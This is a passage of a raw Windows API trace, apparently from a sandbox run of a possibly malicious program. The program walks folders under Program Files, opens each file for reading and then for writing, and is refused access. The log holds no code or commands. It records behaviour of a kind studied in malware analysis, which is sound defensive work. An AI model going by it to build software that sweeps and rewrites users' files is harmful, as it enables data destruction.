lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0082.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.903] AreFileApisANSI () returned 1 [0082.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.903] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.903] AreFileApisANSI () returned 1 [0082.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0082.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui") returned 73 [0082.903] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0082.903] GetFileType (hFile=0x42c) returned 0x1 [0082.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0082.904] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.904] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.904] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.904] CloseHandle (hObject=0x42c) returned 1 [0082.904] AreFileApisANSI () returned 1 [0082.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0082.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui") returned 73 [0082.904] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.905] GetLastError () returned 0x5 [0082.905] GetLastError () returned 0x5 [0082.905] SetLastError (dwErrCode=0x5) [0082.905] GetLastError () returned 0x5 [0082.905] SetLastError (dwErrCode=0x5) [0082.905] GetLastError () returned 0x5 [0082.905] SetLastError (dwErrCode=0x5) [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.905] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.905] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x2e438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0082.905] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0082.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0082.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.905] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.905] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0082.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0082.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0082.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0082.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0082.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.906] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0082.906] AreFileApisANSI () returned 1 [0082.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI", lpUsedDefaultChar=0x0) returned 57 [0082.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0082.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.906] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0082.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.906] AreFileApisANSI () returned 1 [0082.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.906] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0082.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 57 [0082.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.906] GetLastError () returned 0x5 [0082.906] GetLastError () returned 0x5 [0082.907] SetLastError (dwErrCode=0x5) [0082.907] GetLastError () returned 0x5 [0082.907] SetLastError (dwErrCode=0x5) [0082.907] GetLastError () returned 0x5 [0082.907] SetLastError (dwErrCode=0x5) [0082.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0082.907] AreFileApisANSI () returned 1 [0082.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0082.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0082.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 57 [0082.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.907] GetLastError () returned 0x5 [0082.907] GetLastError () returned 0x5 [0082.907] SetLastError (dwErrCode=0x5) [0082.907] GetLastError () returned 0x5 [0082.907] SetLastError (dwErrCode=0x5) [0082.907] GetLastError () returned 0x5 [0082.907] SetLastError (dwErrCode=0x5) [0082.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.907] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0082.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fb08 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0082.908] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8f49e8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd11f8841, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd11f8841, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0082.908] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77fd0 [0082.908] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df7b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.908] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.908] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.909] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.909] AreFileApisANSI () returned 1 [0082.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0082.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.909] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0082.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0082.910] AreFileApisANSI () returned 1 [0082.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.910] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0082.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui") returned 73 [0082.910] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0082.911] GetFileType (hFile=0x42c) returned 0x1 [0082.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0082.911] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.911] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.911] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: 